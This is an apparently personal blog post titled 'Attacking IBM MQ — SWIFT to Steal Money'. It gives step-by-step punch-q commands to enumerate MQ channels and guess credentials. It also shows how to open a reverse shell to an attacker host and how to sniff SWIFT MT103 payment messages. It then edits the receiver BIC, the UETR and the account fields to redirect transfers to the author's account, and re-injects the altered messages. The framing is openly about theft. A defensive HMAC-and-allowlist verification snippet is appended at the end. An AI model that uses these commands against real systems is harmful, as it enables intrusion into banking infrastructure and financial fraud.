Attacking IBM MQ — SWIFT to Steal Money$$$

Yara AlHumaidan (0xy37)
4 min read, Feb 27, 2022


What is IBM MQ?

It is message-oriented middleware: basically, the glue between any two pieces of software that can speak MQ. For example, something written in Java can exchange messages with something written in C.

Messages can be anything, including SWIFT messages. SWIFT Alliance software uses MQ internally as well, and IBM MQ can integrate with a SWIFT MQ instance.

It is detectable by Nessus:

IBM MQ — Client GUI, MQ Explorer

As seen below, we have installed IBM MQ and it is listening on port 1414.

👊 punch-q

punch-q is a small Python utility used to play with IBM MQ instances. Using punch-q, it is possible to perform security-related tasks such as manipulating messages on an IBM MQ queue, which grants one the ability to tamper with business processes at the integration layer.

In the example below we target a banking system, specifically its SWIFT messaging queues; the same technique applies to any other messaging system.

Enumeration

The first step is to discover channels we may be able to access on the queue manager. We can brute-force available channels without any authentication because of how the queue manager responds to probes; this is implemented in the discover channels subcommand of punch-q.

./run-punchq.sh --host <target-ip> --port <target-port> discover channels

Getting Access

Next, we need to see if we can guess any credentials that may work on the discovered channels.

While there may be more undiscovered channels, the three we have so far are a good start.

Channels are often configured to be available without any authentication, and punch-q checks for that during channel enumeration.

./run-punchq.sh --host <target-ip> --port <target-port> discover users -c <CHANNEL NAME>

Getting a Shell

./run-punchq.sh --host <target-ip> --port <target-port> -U <user> -P <password> --channel <channel-name> command reverse --ip <attacker-ip> --port <attacker-port>

Getting Rich =)

As said previously, IBM MQ can integrate with a SWIFT MQ instance. We will use the show queues subcommand to list the message queues themselves. It has a -p flag that you should set to 'MQ.*' to help narrow down interesting queues you could abuse.

./run-punchq.sh --host <target-ip> --port <target-port> -U <user> -P <password> --channel <channel-name> show queues -p 'MQ.*'

With valid queues identified, we are now able to sniff messages, which we can do with the messages sniff subcommand.

./run-punchq.sh --host <target-ip> --port <target-port> -U <user> -P <password> --channel <channel-name> messages sniff --queue MQ.MESSAGE_IN

As shown above, the sniffed SWIFT message contains a money transaction.

What we can do in this case is manipulate the messages (inserting my own account number) and resend them.

This is my bank account =) We need to gather the account number and the bank's SWIFT code.

Next, we have to edit the sniffed messages as follows:
Block 2: after the I103, set the Bank Identifier Code (BIC) to your bank's number. This is the bank's SWIFT code.

Block 3: in tag 121, replace the UUID with a new one. Use the command below to generate a new UUID:

The last thing is to edit block 3 tag 50K and tag 59 with your current account number.

Now that we have the modified message, we can use punch-q to push it to the SWIFT network:

./run-punchq.sh --host <target-ip> --port <target-port> -U <user> -P <password> --channel <channel-name> messages push --queue 'MQ.MESSAGE_IN' -f <location of the modified message>

Now we should have some cash arriving in our account =)
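The defensive counterpart to the tampering described above, as an added example that is not part of the original post and not punch-q or IBM code: the producing application computes an HMAC-SHA256 tag over the exact message text before putting it on the queue (the idea behind SWIFT Alliance's Local Authentication, LAU), and the consumer verifies that tag, checks the block 2 receiver BIC against an allowlist and checks that tag 121 carries a v4 UUID, so a changed BIC, UETR or account field is rejected. The MT103 text, the key and the allowlist are constructed placeholders.

```python
import hashlib
import hmac
import re
import uuid

# Constructed sample MT103 (not from the post): block 2 holds the receiver
# address after "I103", block 3 tag 121 the UETR, block 4 the 50K/59 accounts.
SAMPLE_MT103 = (
    "{1:F01BANKBEBBAXXX0000000000}"
    "{2:I103BANKDEFFXXXXN}"
    "{3:{121:d8f8d3a8-3b9e-4a0b-9a48-3d8f1a2b3c4d}}"
    "{4:\r\n:20:REF12345\r\n:32A:220227EUR1000,00\r\n"
    ":50K:/12345678\r\nALICE\r\n:59:/87654321\r\nBOB\r\n-}"
)
KEY = b"placeholder-key-shared-by-producer-and-consumer"  # assumption
ALLOWED_RECEIVERS = {"BANKDEFF"}  # constructed correspondent allowlist (BIC8)

def parse_blocks(message: str) -> dict:
    """Split an MT message into its top-level {N:...} blocks (block 3 nests)."""
    blocks, depth, start = {}, 0, 0
    for i, ch in enumerate(message):
        if ch == "{":
            if depth == 0:
                start = i
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth == 0:
                num, _, body = message[start + 1:i].partition(":")
                blocks[num] = body
    return blocks

def mac_for(message: str, key: bytes = KEY) -> str:
    """Producer side: HMAC-SHA256 over the exact text put on the queue."""
    return hmac.new(key, message.encode(), hashlib.sha256).hexdigest()

def verify(message: str, mac: str, key: bytes = KEY) -> list:
    """Consumer side: list of findings; an empty list means accept the message."""
    findings = []
    if not hmac.compare_digest(mac_for(message, key), mac):
        findings.append("MAC mismatch: message altered after it was produced")
    blocks = parse_blocks(message)
    receiver = blocks.get("2", "")[4:16]  # 12-char receiver address after I103
    if receiver[:8] not in ALLOWED_RECEIVERS:
        findings.append(f"receiver BIC {receiver[:8]} not in allowlist")
    m = re.search(r"\{121:([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}", blocks.get("3", ""))
    u = uuid.UUID(m.group(1)) if m else None
    if u is None or u.version != 4:
        findings.append("tag 121 UETR missing or not a v4 UUID")
    return findings
```

The MAC only helps if the key is not readable by whoever can reach the queue, so it belongs in the producer and consumer applications, not on the queue manager host that a channel gives access to.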
